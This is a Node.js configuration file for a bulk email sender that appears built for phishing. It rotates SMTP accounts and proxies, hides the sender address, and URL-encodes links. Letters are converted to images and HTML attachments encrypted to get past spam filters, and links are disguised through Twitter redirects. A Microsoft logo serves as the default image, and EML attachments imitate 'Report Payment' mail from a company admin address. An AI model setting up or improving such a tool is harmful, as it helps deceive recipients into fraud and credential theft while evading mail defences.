#!/usr/bin/env node
const smtp = [


// U CAN USE MULTIPLE SMTP ACCOUNTS
 
    
      
      
    {
        host: '',
        port: 587,
        secure: false,
        username: '',
        password: '',
        from_email: '',
      },


/* // delete this line to use multiple smtp accounts
      {
        host: '',
        port: 587,
        secure: false,
        username: '',
        password: '',
        from_email: '',
      },

    */ // delete this line to use multiple smtp accounts

]

let setup = {

    key: "", // PUT YOUR KEY HERE

    MultipleSmtp: "ROTATE", // "ROTATE" AND "QUEUE" 

    mail_priority: "high", // high , medium, low

    sleep_time: 1000,// 1000 for 1 second (can setup 0)

    isMultiThread: false,

    howManyThread: 5, // set as you want , no limit

    from_name: "",

    mail_subject: "TEST SMTP TODAY",

    replyTo: "",

    email_test: false, // true, false

    test_every: 1,

    email_destination: "NOIR@NOIR.COM",

    hidden_frommail : true, // if you want to hide from email, set it here
    // HIDDEN FROMMAIL IS NOT GOOD OPTION IF YOUR SMTP IS NOT STRONG ENOUGH

    URLencode: "https://google.com", // ENCODE YOUR URL HERE , FUNCTION WORKING HERE
    // %68%74%74%70%73%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D => EXAMPLE OF ENCODED URL
}

// SCAN FROMMAIL, HELP U TO GET GOOD FROMMAIL FOR YOUR SMTP
const scan_frommail = {

    test_frommail : true,
    frommail_filename: "frommail.txt",

}

const attachment_and_letter = {
    // LETTER CONFIGURATION
    
    letter: "letter.html", // file name letter
    encode_letter: "base64",

    // ATTACHMENT CONFIGURATION
    useAttachment: false,
    encode_attachment: "base64",
    pdfOrientation: "potrait", // "potriat" or "landscape"for pdf attachment

    // MAILIST FILENAME
    mailist: "mailist.txt", 

}

// CONGIURE YOUR ATTACHMENT HERE
// U CAN ADD MORE THAN 1 ATTACHMENT
const attachment = [
    {
        attachment_name: '.htm',
        path: 'attachment.html', 

        attachmentToPdf: false,
        encryptAttachment: true,

    },

]

// CONVERT HTML TO IMAGE
// WILL HELP TO MAKE YOUR LETTER INBOX AGAIN
const LetterTOimage = {
 
    LetterToImage: false,
    fileName_LetterToImage: "./letterToImage.html",
 
}

const image = {

    useGrabLogo: false, // true false
    
    defaultLogo: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31",
    
    useMylogo: false,

    widthImage_for_grabLogo_letter: "",
    heightImage_for_grabLogo_letter: "",

    widthImage_for_myLogo_letter: "",
    heightImage_for_myLogo_letter: "",


    widthImage_for_grabLogo_attachment: "",
    heighttImage_for_grabLogo_attachment: "",

    widthImage_for_myLogo_attachment: "",
    heighttImage_for_myLogo_attachment: "",
}

// U CAN ADD MORE THAN 1 IMAGE HERE
// THIS ONE VERY USEFUL FOR YOUR IMAGE, SO YOUR IMAGE NOT BLOCKED BY OFFICE
const myLOGO = [
    {
        function_name: "MYLOGO1",
        nameFile: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31"
    }
]

// NEED SUBSCRIPTION FOR THIS
// USING TWITTER TO REDIRECT TO YOUR LINK
const twitter_redirect = { 
    use_redirect: false,
    key_redirect: "",
    your_link: "https://www.google.com?<EMAIL>", // FUNCTON WORKING HERE

}

// USING GOOD PROXY TO FIX YOUR IP AND AVOID JUNK PROBLEM
// U CAN SCAN PROXY HERE TOO, TO GET FREE PROXY

const proxy = {
    test_proxy: false, // IF U WANT SCAN PROXY, SET IT TO TRUE

    proxy_type: "socks5", // socks4, socks5, http
    
    proxy_username: "", // fill it if u use proxy with username and password
    proxy_password: "", // fill it if u use proxy with username and password

    proxy_list : "proxy.txt", // file name proxy list
    proxy_live: "proxy_live.txt", // file name proxy live

    final_proxy: "", // PUT YOUR GOOD PROXY HERE
    // socks5://ip:port => EXAMPLE OF PROXY
    // socks5://username:password@ip:port => EXAMPLE OF PROXY SOCKS5 WITH AUTH
    
}

// CONFIGURATION FOR EML FILE
const attachment_EML = {
    use_EML: false,

    attachment_name_EML: "<COMPANYNAME>.eml",
    letter_eml: "attachment_EML.html",


    subject_eml: "<COMPANYNAME> Report Payment",
    from_email_eml: "admin@<DOMAIN>",

    useAttachment_EML: true,
    attachment: [
        {
            attachmentName: "<RANDNUM5>#<COMPANYNAME>.html",
            path: "EML/attachment.html"
        },

    ],


}


// send multiple attachment as youu want



const setup_time_date = {
    time_zone: "America/Adak", //https://en.wikipedia.org/wiki/List_of_tz_database_time_zones -> list all of time zone in the world
    timezone_name: "long", // "long" and "short"
    time_format_lang: "en",
}

//generate your number random 
const generate_random_number = [
    {
        name: "RANDNUM1",
        lengt_value: 1
    },
    {
        name: "RANDNUM2",
        lengt_value: 2
    },
    {
        name: "RANDNUM3",
        lengt_value: 3
    },
    {
        name: "RANDNUM4",
        lengt_value: 4
    },
    {
        name: "RANDNUM5",
        lengt_value: 5
    },
]

const generate_random_string = [
    {
        name: "random_string_3",
        lengt_value: 3,
        type: "UPPERCASE" // "UPPERCASE","LOWERCASE","RANDOM"
    },
    {
        name: "random_string_4",
        lengt_value: 4,
        type: "LOWERCASE" // "UPPERCASE","LOWERCASE","RANDOM"
    },
    {
        name: "random_string_1",
        lengt_value: 1,
        type: "LOWERCASE" // "UPPERCASE","LOWERCASE","RANDOM"
    },
    {
        name: "random_string_2",
        lengt_value: 2,
        type: "LOWERCASE" // "UPPERCASE","LOWERCASE","RANDOM"
    },
    {
        name: "random_string_5",
        lengt_value: 5,
        type: "LOWERCASE" // "UPPERCASE","LOWERCASE","RANDOM"
    },
]

const menu = {
    change_ip: false,
    requireTLS: true,
    ignoreTLS: false,
    rejectUnauthorized: false,
    maxMessages: 1,
    maxConnections: 1,

}

module.exports = {scan_frommail, smtp, setup, generate_random_number, generate_random_string, setup_time_date, attachment, myLOGO, attachment_EML, menu, proxy,twitter_redirect, image, LetterTOimage, attachment_and_letter, };
